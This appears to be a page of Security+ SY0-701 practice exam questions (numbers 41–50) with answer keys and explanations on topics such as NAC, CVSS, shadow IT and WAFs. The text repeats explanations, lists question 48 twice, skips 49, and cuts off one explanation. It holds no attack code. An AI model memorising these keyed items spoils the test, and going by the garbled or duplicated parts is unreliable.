Practice Free SY0-701 Exam Online Questions
Question #41
Which of the following is a benefit of vendor diversity?
- A . Patch availability
- B . Zero-day resiliency
- C . Secure configuration guide applicability
- D . Load balancing
Correct Answer: B
Question #42
A company is changing its mobile device policy. The company has the following requirements:
Company-owned devices
Ability to harden the devices
Reduced security risk
Compatibility with company resources
Which of the following would best meet these requirements?
- A . BYOD
- B . CYOD
- C . COPE
- D . COBO
Correct Answer: C
C
Explanation:
Detailed COPE (Corporate-Owned, Personally Enabled) devices allow companies to manage and harden company-owned devices while still enabling limited personal use, reducing security risks while maintaining compatibility with corporate resources.
Reference: CompTIA Security+ SY0-701 Study Guide, Domain 3: Security Architecture, Section: "Mobile Device Deployment Models".
C
Explanation:
Detailed COPE (Corporate-Owned, Personally Enabled) devices allow companies to manage and harden company-owned devices while still enabling limited personal use, reducing security risks while maintaining compatibility with corporate resources.
Reference: CompTIA Security+ SY0-701 Study Guide, Domain 3: Security Architecture, Section: "Mobile Device Deployment Models".
Question #43
A security analyst is prioritizing vulnerability scan results using a risk-based approach.
Which of the following is the most efficient resource for the analyst to use?
- A . Business impact analysis
- B . Common Vulnerability Scoring System
- C . Risk register
- D . Exposure factor
Correct Answer: B
B
Explanation:
The Common Vulnerability Scoring System (CVSS)is a standardized framework for assessing the severity of vulnerabilities. It provides a numerical score (0-10) based on factors such as exploitability, impact, and complexity, helping security analysts prioritize remediation efforts based on risk.
Business impact analysis (A)helps identify critical business functions but does not specifically prioritize vulnerabilities.
Risk register (C)tracks identified risks but does not classify vulnerabilities.
Exposure factor (D)is used in quantitative risk assessment but is not an industry standard for vulnerability prioritization.
Reference: CompTIA Security+ SY0-701 Official Study Guide, Risk Management domain.
B
Explanation:
The Common Vulnerability Scoring System (CVSS)is a standardized framework for assessing the severity of vulnerabilities. It provides a numerical score (0-10) based on factors such as exploitability, impact, and complexity, helping security analysts prioritize remediation efforts based on risk.
Business impact analysis (A)helps identify critical business functions but does not specifically prioritize vulnerabilities.
Risk register (C)tracks identified risks but does not classify vulnerabilities.
Exposure factor (D)is used in quantitative risk assessment but is not an industry standard for vulnerability prioritization.
Reference: CompTIA Security+ SY0-701 Official Study Guide, Risk Management domain.
Question #44
The private key for a website was stolen, and a new certificate has been issued.
Which of the following needs to be updated next?
- A . SCEP
- B . CRL
- C . OCSP
- D . CSR
Correct Answer: B
Question #45
After a security incident, a systems administrator asks the company to buy a NAC platform.
Which of the following attack surfaces is the systems administrator trying to protect?
- A . Bluetooth
- B . Wired
- C . NFC
- D . SCADA
Correct Answer: B
B
Explanation:
The correct answer is Wired because Network Access Control (NAC) platforms are primarily designed to control and secure access to an organization’s wired and wireless network infrastructure, with a strong emphasis on enforcing policies at the point where devices connect to the network. In the context of the Security+ SY0-701 objectives, NAC is a key architectural control used to reduce attack surface by preventing unauthorized, unmanaged, or noncompliant devices from gaining network access.
A NAC solution works by authenticating and evaluating devices before granting them access to network resources. This commonly includes checking device identity, credentials, patch levels, antivirus status, and compliance with security policies. For wired networks, NAC enforces controls at switch ports using technologies such as 802.1X, ensuring that only approved devices can connect to internal networks. This directly protects the wired attack surface by stopping threats like rogue devices, compromised laptops, or unauthorized systems from plugging into an Ethernet port and gaining access.
Option A, Bluetooth, is incorrect because NAC platforms do not directly manage short-range personal area network technologies.
Option C, NFC, is also incorrect because NFC is typically used for proximity-based authentication or payments and is outside the scope of NAC enforcement.
Option D, SCADA, refers to industrial control systems, which require specialized security controls and are not the primary target of standard enterprise NAC solutions.
The SY0-701 study guide highlights NAC as a preventive and detective control that supports zero trust principles by verifying devices before allowing access. By securing the wired network attack surface, NAC significantly reduces lateral movement opportunities and limits the impact of compromised or unauthorized endpoints following a security incident.
B
Explanation:
The correct answer is Wired because Network Access Control (NAC) platforms are primarily designed to control and secure access to an organization’s wired and wireless network infrastructure, with a strong emphasis on enforcing policies at the point where devices connect to the network. In the context of the Security+ SY0-701 objectives, NAC is a key architectural control used to reduce attack surface by preventing unauthorized, unmanaged, or noncompliant devices from gaining network access.
A NAC solution works by authenticating and evaluating devices before granting them access to network resources. This commonly includes checking device identity, credentials, patch levels, antivirus status, and compliance with security policies. For wired networks, NAC enforces controls at switch ports using technologies such as 802.1X, ensuring that only approved devices can connect to internal networks. This directly protects the wired attack surface by stopping threats like rogue devices, compromised laptops, or unauthorized systems from plugging into an Ethernet port and gaining access.
Option A, Bluetooth, is incorrect because NAC platforms do not directly manage short-range personal area network technologies.
Option C, NFC, is also incorrect because NFC is typically used for proximity-based authentication or payments and is outside the scope of NAC enforcement.
Option D, SCADA, refers to industrial control systems, which require specialized security controls and are not the primary target of standard enterprise NAC solutions.
The SY0-701 study guide highlights NAC as a preventive and detective control that supports zero trust principles by verifying devices before allowing access. By securing the wired network attack surface, NAC significantly reduces lateral movement opportunities and limits the impact of compromised or unauthorized endpoints following a security incident.
Question #46
An accounting employee recently used software that was not approved by the company.
Which of the following risks does this most likely represent?
- A . Unskilled attacker
- B . Hacktivist
- C . Shadow IT
- D . Supply chain
Correct Answer: C
C
Explanation:
Shadow IT refers to employees using software or services without official approval, often introducing security risks due to lack of control, monitoring, or compliance. This can lead to vulnerabilities, data leakage, or policy violations.
Unskilled attacker (A) and hacktivist (B) are threat actor types; supply chain (D) refers to risks from external partners or vendors, not internal unauthorized software usage.
Shadow IT is highlighted in Security Program Management and Threats domains for its risk implications 【 6:Chapter 16†CompTIA Security+ Study Guide 】 .
C
Explanation:
Shadow IT refers to employees using software or services without official approval, often introducing security risks due to lack of control, monitoring, or compliance. This can lead to vulnerabilities, data leakage, or policy violations.
Unskilled attacker (A) and hacktivist (B) are threat actor types; supply chain (D) refers to risks from external partners or vendors, not internal unauthorized software usage.
Shadow IT is highlighted in Security Program Management and Threats domains for its risk implications 【 6:Chapter 16†CompTIA Security+ Study Guide 】 .
Question #47
A security analyst is reviewing the security of a SaaS application that the company intends to purchase.
Which of the following documentations should the security analyst request from the SaaS application vendor?
- A . Service-level agreement
- B . Third-party audit
- C . Statement of work
- D . Data privacy agreement
Correct Answer: B
B
Explanation:
A third-party audit provides an independent assessment of the SaaS vendor’s security controls, compliance, and practices. This documentation helps verify that the vendor meets security standards
and follows best practices.
Reference: CompTIA Security+ SY0-701 Official Study Guide, Domain 5.3: "Third-party audits offer independent verification of vendor security controls."
Exam Objectives 5.3: “Summarize third-party risk management concepts.”
B
Explanation:
A third-party audit provides an independent assessment of the SaaS vendor’s security controls, compliance, and practices. This documentation helps verify that the vendor meets security standards
and follows best practices.
Reference: CompTIA Security+ SY0-701 Official Study Guide, Domain 5.3: "Third-party audits offer independent verification of vendor security controls."
Exam Objectives 5.3: “Summarize third-party risk management concepts.”
Question #48
An attacker uses XSS to compromise a web server.
Which of the following solutions could have been used to prevent this attack?
- A . NGFW
- B . UTM
- C . WAF
- D . NAC
Correct Answer: C
C
Explanation:
The best answer is C. WAF.
XSS (Cross-Site Scripting) is a web application attack that injects malicious scripts into web content. A WAF (Web Application Firewall) is specifically designed to inspect, filter, and block malicious HTTP and HTTPS traffic targeting web applications. It can help detect and prevent common attacks such as XSS, SQL injection, and other application-layer threats.
Why the other options are incorrect:
C
Explanation:
The best answer is C. WAF.
XSS (Cross-Site Scripting) is a web application attack that injects malicious scripts into web content. A WAF (Web Application Firewall) is specifically designed to inspect, filter, and block malicious HTTP and HTTPS traffic targeting web applications. It can help detect and prevent common attacks such as XSS, SQL injection, and other application-layer threats.
Why the other options are incorrect:
Question #48
An attacker uses XSS to compromise a web server.
Which of the following solutions could have been used to prevent this attack?
- A . NGFW
- B . UTM
- C . WAF
- D . NAC
Correct Answer: C
C
Explanation:
The best answer is C. WAF.
XSS (Cross-Site Scripting) is a web application attack that injects malicious scripts into web content. A WAF (Web Application Firewall) is specifically designed to inspect, filter, and block malicious HTTP and HTTPS traffic targeting web applications. It can help detect and prevent common attacks such as XSS, SQL injection, and other application-layer threats.
Why the other options are incorrect:
C
Explanation:
The best answer is C. WAF.
XSS (Cross-Site Scripting) is a web application attack that injects malicious scripts into web content. A WAF (Web Application Firewall) is specifically designed to inspect, filter, and block malicious HTTP and HTTPS traffic targeting web applications. It can help detect and prevent common attacks such as XSS, SQL injection, and other application-layer threats.
Why the other options are incorrect:
Question #50
Which of the following will harden access to a new database system? (Select two)
- A . Jump server
- B . NIDS
- C . Monitoring
- D . Proxy server
- E . Host-based firewall
- F . WAF
Correct Answer: A,E
A,E
Explanation:
Hardening access to a new database system requires implementing controls that restrict and secure how administrators and applications connect to the database. A jump server (A) is a hardened intermediary system used to manage access to sensitive systems such as databases. By forcing administrators to authenticate through a controlled, monitored jump host instead of connecting directly, organizations reduce attack surfaces and prevent unauthorized lateral movement. Security+ SY0-701 identifies jump servers as critical in securing high-value systems.
A host-based firewall (E) provides system-level traffic filtering directly on the database server. It allows only trusted IPs, ports, and services to communicate with the database, significantly reducing exposure. This is an essential hardening measure because databases should only accept connections from specific application servers or administrative hosts.
NIDS (B) monitors traffic but does not harden access. Monitoring (C) provides visibility but does not restrict access. A proxy server (D) is not typically used for database access. A WAF (F) protects web applications, not internal database systems.
Thus, A (Jump server) and E (Host-based firewall) are the correct hardening controls.
A,E
Explanation:
Hardening access to a new database system requires implementing controls that restrict and secure how administrators and applications connect to the database. A jump server (A) is a hardened intermediary system used to manage access to sensitive systems such as databases. By forcing administrators to authenticate through a controlled, monitored jump host instead of connecting directly, organizations reduce attack surfaces and prevent unauthorized lateral movement. Security+ SY0-701 identifies jump servers as critical in securing high-value systems.
A host-based firewall (E) provides system-level traffic filtering directly on the database server. It allows only trusted IPs, ports, and services to communicate with the database, significantly reducing exposure. This is an essential hardening measure because databases should only accept connections from specific application servers or administrative hosts.
NIDS (B) monitors traffic but does not harden access. Monitoring (C) provides visibility but does not restrict access. A proxy server (D) is not typically used for database access. A WAF (F) protects web applications, not internal database systems.
Thus, A (Jump server) and E (Host-based firewall) are the correct hardening controls.